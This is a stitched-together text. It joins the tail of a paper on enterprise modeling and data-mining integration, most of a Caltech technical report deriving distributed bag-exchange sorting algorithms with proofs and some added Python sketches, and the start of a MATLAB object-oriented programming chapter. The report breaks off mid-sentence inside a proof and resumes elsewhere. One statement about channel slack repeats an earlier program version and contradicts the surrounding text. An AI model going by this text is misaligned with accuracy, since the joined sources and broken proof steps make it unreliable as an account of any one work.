- Several enterprises, especially in North America, already use advanced IT support for advanced planning and scheduling systems based on the Supply Chain Operations Reference (SCOR) model (Stadtler and Kilger 2000). SCOR is not explicitly considered within this approach, but a particular system may use a SCOR model which arises from a different modeling approach.
- The common knowledge enterprise model could generate redundant data, information and files, even though this is thought to have been eliminated.
- Web and text mining have not been considered, even though they are very important for communication, collaboration and co-ordination within an extended enterprise.
Additional investigations, such as multi-tier architectures applied to enterprise information systems, are needed to support this approach. These are especially important because of the above-mentioned complexities.
Web architectures and applications should be investigated and adopted, such as the .NET architecture supported by MDA, and Web services, which are standard modular applications that can be published, located and invoked across the Web. The .NET architecture and Web services are current implementation alternatives for several enterprise applications, but methodologies to integrate legacy systems and databases have not been fully identified.
7. Concluding remarks
The modeling and integration framework presented in this paper provides a dynamic environment for enterprises and extended enterprises, especially to accommodate the following complex and dissimilar software systems:
- Applications to support Customer Relationship Management (CRM), Supply Chain Management (SCM) and Enterprise Resource Planning (ERP). Examples of these systems are SAP R/3, JD Edwards, I2 Technologies, Baan, Oracle Applications, PeopleSoft, Manugistics etc.
- Knowledge discovery and data mining products such as PolyAnalyst™, Clementine, Weka, ArMiner etc.
- Manufacturing and product models stored in databases such as Oracle and ObjectStore, and associated database management systems and applications.
The framework is especially directed at enabling knowledge discovery and data mining activities to be encompassed within an enterprise's existing standardized and referenced architectures and models.
References
ADAMO, J.M., 2001, Data Mining for Association Rules and Sequential Patterns (Berlin: Springer-Verlag).
ADRIAANS, P. and ZANTINGE, D., 1996, Data Mining (London: Addison-Wesley).
BRAMER, M.A. (editor), 1999, Knowledge Discovery and Data Mining (New York: The Institution of Electrical Engineers).
Distributed Sorting

H. Peter Hofstee, Alain J. Martin, and Jan L. A. van de Snepscheut
Computer Science Department
California Institute of Technology
Caltech-CS-TR-90-06

In this paper we present a distributed sorting algorithm, which is a variation on exchange sort, i.e., neighboring elements that are out of order are exchanged. We derive the algorithm by transforming a sequential algorithm into a distributed one. The transformation is guided by the distribution of the data over processes. First we discuss the case of two processes, and then the general case of one or more processes. Finally we propose a more efficient solution for the general case.

1. Program notation

For the sequential part of the algorithms, we use a subset of Edsger W. Dijkstra's guarded command language [1]. For (sequential) statements $S_0$ and $S_1$, statement $S_0 || S_1$ denotes their concurrent execution. The constituents $S_0$ and $S_1$ are then called processes. The statements may share variables (cf. [6]). We transform our algorithms in such a way, however, that the final code contains no shared variables and all synchronization and communication is performed by message passing.

The semantics of the communication primitives is as described in [5]. The main difference with C.A.R. Hoare's proposal in [3] is in the naming of channels rather than processes. In [4], the same author proposes to name channels instead of processes in communication commands, but differs from our notation by using one name per channel instead of our two: output command $R!E$ in one process is paired with input command $L?v$ in another process by declaring the pair $(R, L)$ to be a channel between the two processes. Each channel is between two processes only. When declaring $(R, L)$ to be a channel, we write the name on which the output actions are performed first and the name on which the input actions are performed last.
For an arbitrary command $A$, let $c_A$ denote the number of completed $A$ actions, i.e., the number of times that command $A$ has been executed since initiation of the program's execution. The synchronization requirement (cf. [5]) fulfilled by a channel $(R, L)$ is that

$$c_R = c_L$$

holds at any point in the computation.

Note: It is sometimes attractive to weaken the synchronization requirement by putting some bound on \( c_R - c_L \). This may be a lower bound only, or both a lower and an upper bound. The maximum difference is then called the slack, since it indicates how far the synchronized processes can get out of step. The use of a nonzero slack sometimes leads to minor complications in proofs and definitions, and is not pursued here.

The execution of a command results either in the completion of the action or in its suspension when its completion would violate the synchronization requirement. From suspension until completion an action is pending, and the process executing the action is delayed. We introduce boolean \( q_A \) equal to the predicate "an \( A \) action is pending". The progress requirement states that actions are suspended only if their completion would violate the synchronization requirement, i.e., channel \((R, L)\) satisfies

\[ \neg q_R \lor \neg q_L \]

The \( n \)th \( R \) action is said to match the \( n \)th \( L \) action. The completion of a matching pair of actions is called a communication. The communication requirement states that execution of matching actions \( R!E \) and \( L?v \) amounts to the assignment \( v := E \).

2. A small/large sorter for two bags

Given are two finite, nonempty bags of integers. The integers in the two bags are to be rearranged such that one bag is dominated by the other bag, i.e., no element of the first bag exceeds any element of the second bag. The number of elements of each of the two bags may not be changed. We use the following notation.
The two bags to be sorted are \( b0 \) and \( b1 \); their initial values are \( B0 \) and \( B1 \) respectively. For bag \( b \), \( \#b \) denotes the number of elements in \( b \). Bag union and difference are denoted by \( + \) and \( - \) respectively. The number of times that a number \( x \) occurs in the bag union \( b0 + b1 \) is the number of occurrences of \( x \) in \( b0 \) plus the number of occurrences in \( b1 \). The number of occurrences of \( x \) in \( b0 - b1 \) is the number of occurrences of \( x \) in \( b0 \) minus the number of occurrences in \( b1 \), and is well-defined only if the latter difference is nonnegative. We do not distinguish between elements and singleton bags. Postcondition \( Z \) of the distributed sorting program is concisely written as follows. \[ Z: \#b0 = \#B0 \land \#b1 = \#B1 \land b0 + b1 = B0 + B1 \land \max(b0) \leq \min(b1) \] The first two conjuncts express that the size of the two bags is unaffected, the third conjunct expresses that the elements involved remain the same, and the fourth conjunct expresses that \( b0 \) is dominated by \( b1 \). Notice that \( \max(b0) < \min(b1) \) is a stronger requirement: in fact it is so strong that it cannot be established in general. The problem can simply be solved by repeatedly exchanging the maximum element of \( b0 \) and the minimum element of \( b1 \) until postcondition \( Z \) is established. This amounts to selecting the first three conjuncts of \( Z \) as invariant \[ \#b0 = \#B0 \land \#b1 = \#B1 \land b0 + b1 = B0 + B1 \] and the negation of the last conjunct of $Z$ as guard of the repetition. The program is $$\text{do } \max(b0) > \min(b1) \rightarrow b0, b1 := b0 + \min(b1) - \max(b0), b1 + \max(b0) - \min(b1) \text{ od}$$ The invariant is vacuously true upon initialization since then $b0 = B0 \land b1 = B1$. The invariant is maintained by the exchange statement, independently of the guard. 
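The loop can be sketched in Python as a quick sanity check, representing bags as lists (the function name `small_large_sort` is ours, not from the paper):

```python
def small_large_sort(b0, b1):
    """Repeatedly exchange max(b0) with min(b1) until b0 is dominated by b1.

    Bags are modeled as lists; list.remove deletes a single occurrence,
    so duplicates behave like multiset elements.
    """
    b0, b1 = list(b0), list(b1)
    while max(b0) > min(b1):
        M, m = max(b0), min(b1)
        b0.remove(M); b0.append(m)   # b0 := b0 + min(b1) - max(b0)
        b1.remove(m); b1.append(M)   # b1 := b1 + max(b0) - min(b1)
    return b0, b1
```

Each iteration strictly decreases the sum of the elements in `b0`, which is exactly the variant-function argument for termination.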
Upon termination $\max(b0) \leq \min(b1)$ holds, which in conjunction with the invariant implies postcondition $Z$. We are left with the easy task of proving termination. Let variant function $s$ be the sum of the elements in $b0$ minus the sum of the elements in $b1$. Since $b0$ and $b1$ are finite bags with fixed union, $s$ is bounded from below. On account of the guard, every exchange decreases the sum of the elements in $b0$ and increases the sum of the elements in $b1$, and thereby decreases $s$. Hence, the loop terminates.

3. Program transformation

We shall now transform the program, under invariance of its semantics, so as to partition it into two sets of (almost) noninterfering statements. We introduce fresh variables both for this purpose and for avoiding repeated evaluation of $\max(b0)$ and $\min(b1)$. When we have two sets of noninterfering statements they can be executed by two processes, which is what we aim at. The interference that remains translates into communication or synchronization actions. Introducing $M$ and $m$ to avoid reevaluation of $\max$ and $\min$, and copies $LM$ and $rm$ to reduce interference, yields the program in Figure 1.

    M, m := max(b0), min(b1);
    rm, LM := m, M;
    do guard →
        b0, b1 := b0 + rm - M, b1 + LM - m;
        M, m := max(b0), min(b1);
        rm, LM := m, M
    od

-Figure 1-

Notice that guard $\max(b0) > \min(b1)$ can be rewritten in many ways, including $M > rm$ and $LM > m$. In Figure 1, we have not made a choice yet, and both rewrites will be used later (which is the reason for not writing down a specific guard here). The bag differences in $b0 + rm - M$ and $b1 + LM - m$ are well-defined since $M$ is an element of $b0$ and $m$ is an element of $b1$. Apart from the concurrent assignment $rm, LM := m, M$ we have partitioned the program into two sets of noninterfering statements.
Since the order of noninterfering statements can be swapped freely, we can modify the program slightly so as to group together the actions on $b0, M, rm$ and the actions on $b1, m, LM$. We obtain Figure 2, in which a suggestive layout has been used.

\[ M := \max(b_0) \quad \| \quad m := \min(b_1); \]
\[ rm := m \quad \| \quad LM := M; \]
\[ \text{do guard } \rightarrow \]
\[ \quad (b_0 := b_0 + rm - M; \quad M := \max(b_0)) \quad \| \quad (b_1 := b_1 + LM - m; \quad m := \min(b_1)); \]
\[ \quad rm := m \quad \| \quad LM := M \]
\[ \text{od} \]

-Figure 2-

Now, assume that we can split the action \( rm := m \parallel LM := M \) into two concurrent parts, \( X \) and \( Y \) say, such that \( c_X = c_Y \) and \( \neg q_X \lor \neg q_Y \) hold, and such that the completion of \( X \) and \( Y \) is equivalent to \( rm := m \parallel LM := M \). We may rewrite the program from Figure 2 into \( (p_0 \parallel p_1) \) as given in Figure 3. Notice that we have used both ways of rewriting the guard mentioned above.

\[ p_0 \equiv M := \max(b_0); \quad X; \]
\[ \quad \text{do } M > rm \rightarrow b_0 := b_0 + rm - M; \quad M := \max(b_0); \quad X \text{ od} \]

\[ p_1 \equiv m := \min(b_1); \quad Y; \]
\[ \quad \text{do } LM > m \rightarrow b_1 := b_1 + LM - m; \quad m := \min(b_1); \quad Y \text{ od} \]

-Figure 3-

The correctness of the program in Figure 3 can be proved in two ways. We may either prove the correctness of the transformation, or we may prove the correctness of the program in Figure 3 directly. Proving the correctness of the transformation is the more elegant (and slightly easier) of the two. Yet we give a direct proof of the program's correctness, because it comes closer to suggesting the generalization to any number of processes. We postulate that \( P \) is an invariant of the distributed program.
\[ P : \quad \max(b_0) = M = LM \land \min(b_1) = m = r_m \land \\ \#b_0 = \#B_0 \land \#b_1 = \#B_1 \land \ b_0 + b_1 = B_0 + B_1 \] What do we mean by claiming that \( P \) is an invariant of \( (p_0 \parallel p_1) \)? Both \( p_0 \) and \( p_1 \) contain a loop and by invariant we mean in this case that \( P \) holds when both processes have completed the initialization (and no further actions), and that \( P \) is maintained if both processes perform one step of the loop. Since initialization and loop body end with action \( X \) in \( p_0 \) and action \( Y \) in \( p_1 \), and since we have \( c_X = c_Y \), this makes sense. Notice that, for example, we do not claim that \( P \) holds if \( p_0 \) has completed \( X \), whereas \( p_1 \) has completed \( Y \) and also the subsequent update of \( b_1 \). In order to check the invariance, we have to verify - \{true\} (M := \max(b0); X) \parallel (m := \min(b1); Y) \{P\} - P \Rightarrow (M > rm \equiv LM > m) - \{P \land M > rm \land LM > m\} \( (b0 := b0 + rm - M; \ M := \max(b0); \ X) \parallel (b1 := b1 + LM - m; \ m := \min(b1); \ Y) \{P\} \). All three follow from the choice of P and the assumptions on X and Y. We are left with the task of providing X and Y in terms of the commands that we have at our disposal. Using channels (R, L) and (l, r), with zero slack, we may write \[ X \equiv R!M; \ r?rm \] \[ Y \equiv L?LM; \ l!m \] Since \( cX = c_r \) and \( cY = c_l \) by construction, and since \( c_r = c_l \) by definition, we have \( cX = cY \). 
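As an illustration, the program \( (p_0 \parallel p_1) \) of Figure 3, with \( X \equiv R!M; r?rm \) and \( Y \equiv L?LM; l!m \), can be simulated in Python with two threads and two queues as channels. This is a sketch of ours, not code from the paper; a `Queue` gives each channel positive slack, which the text notes is also acceptable for this version of X and Y.

```python
import queue
import threading

# Channel (R, L) carries M rightward; channel (l, r) carries m leftward.

def p0(b0, R, r, out):
    M = max(b0)
    R.put(M); rm = r.get()            # X ≡ R!M; r?rm
    while M > rm:
        b0.remove(M); b0.append(rm)   # b0 := b0 + rm - M
        M = max(b0)
        R.put(M); rm = r.get()        # X
    out['b0'] = b0

def p1(b1, L, l, out):
    m = min(b1)
    LM = L.get(); l.put(m)            # Y ≡ L?LM; l!m
    while LM > m:
        b1.remove(m); b1.append(LM)   # b1 := b1 + LM - m
        m = min(b1)
        LM = L.get(); l.put(m)        # Y
    out['b1'] = b1

def distributed_two_bag(b0, b1):
    RL = queue.Queue()   # channel (R, L)
    lr = queue.Queue()   # channel (l, r)
    out = {}
    t0 = threading.Thread(target=p0, args=(list(b0), RL, lr, out))
    t1 = threading.Thread(target=p1, args=(list(b1), RL, lr, out))
    t0.start(); t1.start(); t0.join(); t1.join()
    return out['b0'], out['b1']
```

Because each round delivers `M` to `p1` and `m` to `p0`, the guards `M > rm` and `LM > m` compare the same pair of values, so both threads always take the same branch: no deadlock, exactly as argued above.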
Actions X and Y may be suspended on either channel, hence

\[ q_X \equiv (c_R = c_r \land q_R) \lor (c_R = c_r + 1 \land q_r) \]
\[ q_Y \equiv (c_L = c_l \land q_L) \lor (c_L = c_l + 1 \land q_l) \]

We calculate

\[ q_X \land q_Y \]
\[ = \quad \{c_R = c_L, \ c_r = c_l\} \]
\[ (c_R = c_r = c_L = c_l \land q_R \land q_L) \lor (c_R = c_r + 1 = c_L = c_l + 1 \land q_r \land q_l) \]
\[ \Rightarrow \]
\[ (q_R \land q_L) \lor (q_r \land q_l) \]
\[ = \quad \{\neg q_R \lor \neg q_L, \ \neg q_r \lor \neg q_l\} \]
\[ \text{false} \]

i.e., we have \( \neg q_X \lor \neg q_Y \) as required. From the communication requirement it follows that \( X \parallel Y \) is equivalent to \( rm := m \parallel LM := M \).

The following, more symmetric, version of X and Y also meets the requirements.

\[ X \equiv R!M \parallel r?rm \]
\[ Y \equiv L?LM \parallel l!m \]

The above two versions are also correct if the slack is positive. The version

\[ X \equiv R!M; \ r?rm \]

is correct only if the slack is positive.

Observe that the verification of the correctness of the program fits the following pattern. We postulate an invariant and show that it holds in the initial state and is not falsified by an iteration of the loop. We provide a variant function that is bounded from below and decreases with each iteration of the loop. Because the variant function is integer valued, this implies that the loop terminates. Upon termination we have the truth of the invariant and the falsity of the loop's guard, and we show that this combination implies the postcondition. So much is standard practice in the case of sequential programs. What we add for our distributed programs is the proof of absence of deadlock. Deadlock occurs if one of two processes connected by a channel initiates a communication along the channel and the other process does not. We, therefore, show that mutual communications are initiated under the same condition.

4. More bags

The problem is generalized as follows.
Given is a finite sequence of (one or more) finite nonempty bags and a linear array of processes, each of which contains one of the bags and communicates with neighbors in the array to sort the bags in such a way that each bag is dominated by the next bag in the sequence, and such that the size of the bags remains constant. The generalized problem is significantly different from the two-bag version in the following sense. Consider sequence ABC of three bags. If A is dominated by B but B is not dominated by C then an exchange of elements between B and C may cause B to no longer dominate A, i.e., it may necessitate an exchange between A and B. This shows that the process that stores A cannot be terminated when A is dominated by B. The proper thing to do is to terminate a process when the bag it stores is dominated by all bags to the right of it and dominates all bags to the left of it. The two algorithms that follow are both based on exchanging elements of neighboring bags, and termination detection while ensuring progress is the hard part of the problem. In order to avoid excessive use of subscripts, we use the following notation. For some anonymous process, \( b \) is the bag it stores with initial value \( B \), \( rb \) is the union of all bags to its right with initial value \( rB \), and \( lb \) is the union of all bags to its left with initial value \( lB \). Notice that \( lB \) and \( rB \) are the empty bag \( \emptyset \) for the leftmost and rightmost processes respectively. The required postcondition of the program can be written as a conjunction of terms, one for each process, viz. \[ \max(lb) \leq \min(b) \land \max(b) \leq \min(rb) \] We find it more attractive to rewrite this into \[ \max(lb) \leq \min(b + rb) \land \max(lb + b) \leq \min(rb) \] since the first term expresses that domination has been achieved between the union of all bags to the left and the remaining bags, and the second term does so for all bags to the right. 
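The rewritten postcondition says that at every cut between a process and its right neighbors, the union of the left bags is dominated by the union of the rest. A small Python predicate (the name `is_globally_sorted` is ours) makes this concrete:

```python
def is_globally_sorted(bags):
    """Check max(lb) <= min(b + rb) at every cut, i.e., for every process
    the union of the bags to its left is dominated by the union of its own
    bag and the bags to its right."""
    for i in range(1, len(bags)):
        lb = [x for bag in bags[:i] for x in bag]     # union of left bags
        rest = [x for bag in bags[i:] for x in bag]   # b + rb
        if max(lb) > min(rest):
            return False
    return True
```

The second form of the postcondition (domination of all bags to the right by `lb + b`) is the same set of cut conditions read from the other side, so one predicate covers both conjuncts.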
The invariant is obtained by introducing a variable for each of the four quantities involved, and by retaining the size restriction on the bags. Hence, the invariant of the distributed program is the conjunction of a number of terms, one for each process. Each such term is \[ P : \max(lb) = LM \land \max(lb+b) = M \land \min(rb) = rm \land \min(b+rb) = m \\ \land \#b = \#B \land lb + b + rb = lB + B + rB \] where \(\max(\emptyset) = -\infty\) and \(\min(\emptyset) = +\infty\). First we concentrate on the statements that initialize the variables such that \(P\) holds. Maxima are simply propagated from left to right, and minima from right to left. \[ (L?LM; M := \max(b + LM); R!M) \\ \quad \parallel (r?rm; m := \min(b + rm); l!m) \] Action \(L?LM\) is understood to be \(LM := -\infty\) for the leftmost process, and \(r?rm\) is understood to be \(rm := +\infty\) for the rightmost process. Action \(l!m\) is understood to be \(skip\) for the leftmost process, and \(R!M\) is understood to be \(skip\) for the rightmost process. These conventions can be implemented with dummy processes next to the two extreme processes, or with conditional statements in the two extreme processes. Next we concentrate on the loop, i.e., we concentrate on maintaining the invariant. Observe that an element from \(lb\) should be exchanged with an element from \(b + rb\) if \(\max(lb) > \min(b + rb)\), i.e., if \(LM > m\). Like in the case of two bags, the maximum element from \(lb\) is exchanged with the minimum element from \(b + rb\). Similarly, the minimum element from \(rb\) is exchanged with the maximum element from \(lb + b\) if \(\max(lb + b) > \min(rb)\), i.e., if \(M > rm\). This suggests the program shown in Figure 4. 
(L?LM; M := max(b + LM); R!M) || (r?rm; m := min(b + rm); l!m);
do LM > m ∧ M > rm →
        b := b + LM - M + rm - m;
        (L?LM; M := max(b + LM); R!M) || (r?rm; m := min(b + rm); l!m)
[] LM > m ∧ M ≤ rm →
        b := b + LM - m;
        (L?LM; M := max(b + LM)) || (m := min(b); l!m)
[] LM ≤ m ∧ M > rm →
        b := b + rm - M;
        (M := max(b); R!M) || (r?rm; m := min(b + rm))
od

-Figure 4-

We prove the correctness of this algorithm. Consider two processes that are neighbors in the linear array. Bag \(lb + b\) in the left process is bag \(b\) in the right process, hence \(M\) in the left process has the same value as
Notice that the order of the bag operations is important: $b := b + LM - M + rm - m$ and $b := b + LM - m + rm - M$ are not equivalent. We prove (a) $LM > m \land M > rm \Rightarrow M \in b + LM \land m \in b + rm \land M \neq m$ (b) $LM > m \land M \leq rm \Rightarrow m \in b + LM$ (c) $LM \leq m \land M > rm \Rightarrow M \in b + rm$ case (a) $$M \in b + LM \land m \in b + rm \land M \neq m$$ $$= \{ P \}$$ $$\max(lb + b) \in b + \max(lb) \land \min(b + rb) \in b + \min(rb) \land \max(lb + b) \neq \min(b + rb)$$ $$\Leftarrow \{ \max(lb + b) = \max(b + \max(lb)), \min(b + rb) = \min(b + \min(rb)) \}$$ $$\max(lb + b) > \min(b + rb)$$ $$\Leftarrow \{ \max(lb + b) \geq \max(lb), P \}$$ $LM > m$ case (b) $$m \in b + LM$$ $$= \{ P \}$$ $$\min(b + rb) \in b + \max(lb)$$ $$\Leftarrow \{ \min(b) \in b \}$$ $$\min(b + rb) = \min(b)$$ $$\Leftarrow \max(b) \leq \min(rb)$$ $$\Leftarrow \{ \max(b) \leq \max(lb + b), P \}$$ $M \leq rm$ case (c) is similar to case b. Termination of the algorithm follows directly from the observation that, in every step of the iteration, the number of inversions is decreased. (An inversion is a pair of elements from two different bags, where the left element exceeds the right element.) The number of inversions is a natural number and, hence, bounded from below which implies termination. Upon termination we have a state that satisfies both the invariant and the negation of all three guards. We, therefore, have \[ P \land LM \leq m \land M \leq rm \] \[ \Rightarrow \max(lb) \leq \min(b + rb) \land \max(lb + b) \leq \min(rb) \] upon termination, which is the required postcondition. Notice that the algorithm is not correct if the last two guards are weakened to \( LM > m \) and \( M > rm \) respectively. It is then possible for elements to be removed from a bag of which they are not an element, implying that the union of all bags is not constant. 
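Abstracting from the message passing, the net effect of Figure 4 can be rendered sequentially: keep exchanging an out-of-order (maximum, minimum) pair between neighboring bags until every bag is dominated by its right neighbor. Since the bags are nonempty, pairwise neighbor domination implies the global postcondition. The sketch below is ours and is not the distributed protocol itself:

```python
def bag_exchange_sort(bags):
    """Sequential rendering of the net effect of Figure 4: exchange an
    out-of-order (max, min) pair between neighboring bags until every bag
    is dominated by its right neighbor.  Every exchange removes at least
    one inversion, so the procedure terminates."""
    bags = [list(b) for b in bags]
    changed = True
    while changed:
        changed = False
        for i in range(len(bags) - 1):
            M, m = max(bags[i]), min(bags[i + 1])
            if M > m:
                bags[i].remove(M); bags[i].append(m)
                bags[i + 1].remove(m); bags[i + 1].append(M)
                changed = True
    return bags
```

The termination argument is the same inversion count used above: an inversion is a pair of elements in different bags with the left element exceeding the right one, and each exchange strictly decreases that count.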
Statement \( M := \max(b + LM) \) does not change \( M \) in the second guarded command, and may, therefore, be omitted. Similarly for \( m := \min(b + rm) \) in the third guarded command.

5. A more efficient solution

The invariant proposed in the previous section was easy to guess (and understand), and led to a simple program. On closer inspection, however, it turns out that the program is not very efficient. Each step of the loop contains a construct for propagating maxima from left to right, and minima from right to left. This propagation requires time proportional to the number of bags, making the execution time of the whole program quadratic in the number of bags. Operationally speaking, the processes are suspended most of the time on communications of global extremes.

It seems to be more attractive to perform some exchanges of local extremes between neighbors in the mean time: we may hope to obtain a program whose execution time is linear in the number of bags instead of quadratic. This idea is not easily translated into a program, mainly because detecting the end of "the mean time" is nontrivial. A similar effect, however, can be obtained in a different way. Exchanges of local extremes between neighbors may be performed while, in passing, global extremes are computed. The global extremes can be computed by some sort of approximation technique. Formally, this amounts to weakening the invariant from \( LM = \max(lb) \) to \( LM \geq \max(lb) \), and \( rm = \min(rb) \) to \( rm \leq \min(rb) \). If we stick to the terms \( M = \max(b + LM) \) and \( m = \min(b + rm) \), as well as the other terms, then the conjunction of \( LM \leq m \) and \( M \leq rm \) and the invariant implies the postcondition. Hence, the weaker invariant is still sufficiently strong.
If we aim at a program whose structure is similar to the program in the previous section, we have a loop in which each step corresponds to a communication with the left neighbor, or with the right neighbor, or both. Deadlock is avoided if neighbors initiate their mutual communications under the same condition. Since only approximations of global extremes are locally available, we cannot simply use \( LM > m \) and \( M > rm \). Since \( LM \) is obtained from the, previously communicated, left neighbor's \( M \), the left neighbor is to initiate a communication based on the previous value of \( M \), say \( PM \). This leads to invariant \( Q \) and to the program of Figure 5.

\[ Q : \quad LM \geq \max(lb) \ \land \ PM \geq M = \max(b + LM) \ \land \ rm \leq \min(rb) \ \land \ pm \leq m = \min(b + rm) \ \land \ \#b = \#B \ \land \ lb + b + rb = lB + B + rB \]

if lb = ∅ → LM := -∞ [] lb ≠ ∅ → LM := +∞ fi;
if rb = ∅ → rm := +∞ [] rb ≠ ∅ → rm := -∞ fi;
M, PM, m, pm := max(b + LM), +∞, min(b + rm), -∞;
do LM > pm ∧ PM > rm →
        L?(x, LM) || l!(min(b), m) || r?(y, rm) || R!(max(b), M);
        if x > min(b) ∧ max(b) > y → b := b - min(b) - max(b) + x + y
        [] x > min(b) ∧ max(b) ≤ y → b := b - min(b) + x
        [] x ≤ min(b) ∧ max(b) > y → b := b - max(b) + y
        [] x ≤ min(b) ∧ max(b) ≤ y → skip
        fi;
        M, PM, m, pm := max(b + LM), M, min(b + rm), m
[] LM > pm ∧ PM ≤ rm →
        L?(x, LM) || l!(min(b), m);
        if x > min(b) → b := b - min(b) + x [] x ≤ min(b) → skip fi;
        M, m, pm := max(b + LM), min(b + rm), m
[] LM ≤ pm ∧ PM > rm →
        r?(y, rm) || R!(max(b), M);
        if max(b) > y → b := b - max(b) + y [] max(b) ≤ y → skip fi;
        M, PM, m := max(b + LM), M, min(b + rm)
od

-Figure 5-

Notice that, due to the exchange of local extremes between neighbors rather than the propagation of global extremes, it may be necessary to replace two elements from the local bag. Hence, this algorithm is applicable only to the case in which each bag (except for the leftmost and rightmost bags) contains at least two elements.

We prove the correctness of this algorithm. Consider two processes that are neighbors in the linear array. We show that $PM$ and $rm$ in the left process have the same value as $LM$ and $pm$ in the right process. Initially we have $PM = +\infty$ and $rm = -\infty$ in the left process (since its $rb$ is nonempty). Similarly we have $LM = +\infty$ and $pm = -\infty$ in the right process. The four variables are assigned a new value only when the two processes communicate with each other. The relevant statements are

    r?(y, rm) || R!(max(b), M);  PM := M

in the left process, and

    L?(x, LM) || l!(min(b), m);  pm := m

in the right process. Inspection reveals that both $PM$ and $LM$ are assigned the value $M$, and that both $rm$ and $pm$ are assigned the value $m$. Hence, the correspondence between the variables is maintained. Consequently, the two processes initiate their mutual communications under the same condition, which excludes deadlock.

Next we show that the operations on $b$ do not falsify the invariant. Inspection of the communication statements (as in the paragraph above) reveals that $\max(b)$ and $y$ in the left process correspond to $x$ and $\min(b)$ in the right process. Hence the updates of the bags are performed under the same condition and change neither the union of the bags nor the size of each bag.
Notice that the assumption $\#b \geq 2$ is essential here. In the same vein the invariance of $LM \geq \max(lb)$ and $PM \geq M = \max(b + LM)$ may be proved.

It remains to prove termination. To that end we strengthen the invariant to express that $M$ is a very good approximation of $\max(lb + b)$. In fact, we have either $M = +\infty$ or $M = \max(lb + b)$. We can even prove that also $M = \max(b)$ holds in the latter case. This expresses the (strong) property that the largest value of $lb + b$ resides in bag $b$, and that the second largest value of $lb + b$ resides either in $b$ or in the left neighbor's bag, etc. Furthermore, we show that $M = +\infty$ does not persist too long. More precisely we show that, in the process which has $k$ other processes to its left, $M = \max(b) = \max(lb + b)$ holds after $k$ iterations of the loop.

We postulate that

$$LM = PM = M = +\infty \quad \vee \quad (+\infty > LM \geq \max(lb) \land PM \geq M = \max(b) = \max(lb + b))$$

is an invariant, and we verify this claim. Initially $M = +\infty$ holds in every process except in the leftmost process ($k = 0$), in which $M = \max(b) = \max(lb + b)$. If $M = +\infty$ then the process initiates a communication to the left (since $M = +\infty$ implies $LM = +\infty$, and $pm < +\infty$). The relevant statements are

    L?(x, LM) ...
    if x > min(b) ... → b := b - min(b) + x ... fi;
    M := max(b + LM)

together with

    R!(max(b), M)

in the left process. If $M = +\infty$ holds in the left process prior to this step, then $LM = M = +\infty$ holds in the right process after this step. If $M = \max(b) = \max(lb + b)$ holds in the left process prior to this step, then the statement $L?(x, LM)$ in the right process leads to $x = LM = \max(lb)$. Hence, the updates of $b$ and $M$ lead to $M = \max(b) = \max(lb + b)$ in the right process, one iteration after this relation has been established in its left neighbor.
Notice that the update of the bag in the left neighbor process may falsify $LM = \max(lb)$, but $LM \geq \max(lb)$ is maintained. As a result, in each process we have $M = \max(b) = \max(lb + b)$ after a number of steps equal to the number of processes. Similarly, $m = \min(b) = \min(b + rb)$ holds.

When this state has been reached it is not guaranteed that the variant function from the previous two sections is decreased with every iteration of the loop. That variant function contained the bags only, and it is possible that no bag is changed by an iteration of the loop. However, if in this state the bag is not changed then it is the last iteration of the loop: if, for example, $LM > pm$ and $x \leq \min(b)$, then $LM = x \leq \min(b) = m$, and $pm$ is set to $m$, thereby falsifying $LM > pm$, which excludes further iterations containing a communication to the left.

Upon termination we have the invariant and the negation of the guards

\[ Q \land LM \leq pm \land PM \leq rm \]
\[ \Rightarrow \quad \max(lb) \leq LM \leq pm \leq m = \min(b + rm) \ \land \ \max(b + LM) = M \leq PM \leq rm \leq \min(rb) \]
\[ \Rightarrow \quad \max(lb) \leq \min(b + rb) \land \max(lb + b) \leq \min(rb) \]

which is the required postcondition.

The time complexity of the present solution is linear in the number of bags, $N$ say. Thus, we have gained a factor of $N$ at the expense of sending two integers per communication instead of one, and the addition of two integer variables per process. If each bag contains $k$ elements, the number of iterations is $N \cdot k$ in the worst case. Assuming that the operations on a bag are $O(\log(k))$ each, this implies that the worst case time complexity is $O(N \cdot k \cdot \log(k))$.

In this program the guards of the second and third alternative of the loop may be weakened to $LM > pm$ and $PM > rm$ respectively, without falsifying the invariant.
It has the advantage that the program may be simplified (by omitting the first alternative) and that the requirement $\#b \geq 2$ may be weakened to $\#b \geq 1$, but it has the distinct disadvantage that the program does not necessarily terminate: if both guards are true it is possible that selection of one of the alternatives does not change the state in either of the two processes involved. If fair selection of the alternatives is postulated, then one can show that the variant function decreases eventually, which implies that the program terminates eventually.

6. Conclusion

We have presented this paper as an exercise in deriving parallel programs. First, a sequential solution to the problem is presented, which is subsequently transformed into a parallel solution. Next, extra variables and communication channels are introduced. Finally, the invariant is weakened. The transformation steps are not automatic in the sense that absence of deadlock had to be proved separately.

The resulting algorithms have some of the flavor of Odd-Even transposition sort. They are, however, essentially different in two respects. In every step of the loop in Odd-Even transposition sort, a process communicates with only one of its two neighbors, whereas in every step of the loop of our algorithms a process communicates with both its neighbors (as long as necessary). The other difference is that our algorithms are "smooth" (cf. [2]) in the sense that the execution time is much less for almost-sorted arrays than for hardly-sorted arrays, with a smooth transition from one to the other behavior. This is due to the conditions under which processes engage in communications.

Acknowledgements

We are grateful to Johan J. Lukkien for many discussions during the design of the algorithms, and to Wayne Luk for helpful remarks on the presentation.

References
Chapter Objectives

This chapter discusses the object-oriented paradigm, including:
- Object-oriented programming (OOP) in general
- How MATLAB implements OOP

This chapter is not intended as a full treatment of the art and science of object-oriented design and object-oriented programming (OOP). Rather, it presents some basic definitions of terms used in OOP and the implementation in MATLAB of some simple constructs. Subsequent chapters will extend these ideas to illustrate how dynamic data structures may be constructed and manipulated using OOP.

18.1 Object-Oriented Programming

In Chapters 1–17 we saw MATLAB as a means for manipulating arrays—sometimes in the guise of vectors or matrices, character strings, or cell arrays. Furthermore, the manipulation performed was conducted by writing scripts that sometimes call functions—either the functions built into MATLAB or functions we create ourselves. This type of programming is referred to as being in the procedural paradigm—functions and scripts as a form of procedure. This chapter considers a different paradigm altogether—the object-oriented (OO) paradigm. In this programming style, we still begin with a script, but the scripts that we write will usually create and interact with objects rather than arrays.

18.1.1 OO Background

Languages that express the essential elements of the OO paradigm have been around since the 1960s when Simula was first developed. However, in the 1980s and 1990s, as massive software projects and especially graphical user interfaces (GUIs) became common, OO emerged as the paradigm of choice for designing and developing large software systems. Major software systems (like the various releases of Microsoft Windows) faced enormous design and integration challenges that could not be met by conventional programming practices. They needed language-imposed management of the interaction between large and small collections of programs and data.
A secondary requirement in efficiently developing large software systems is the ability to reuse core software modules without rewriting their entire contents. OO principles allow core modules to be reused in three ways:

- Reused intact, because the definitions of how to use them are precisely recorded
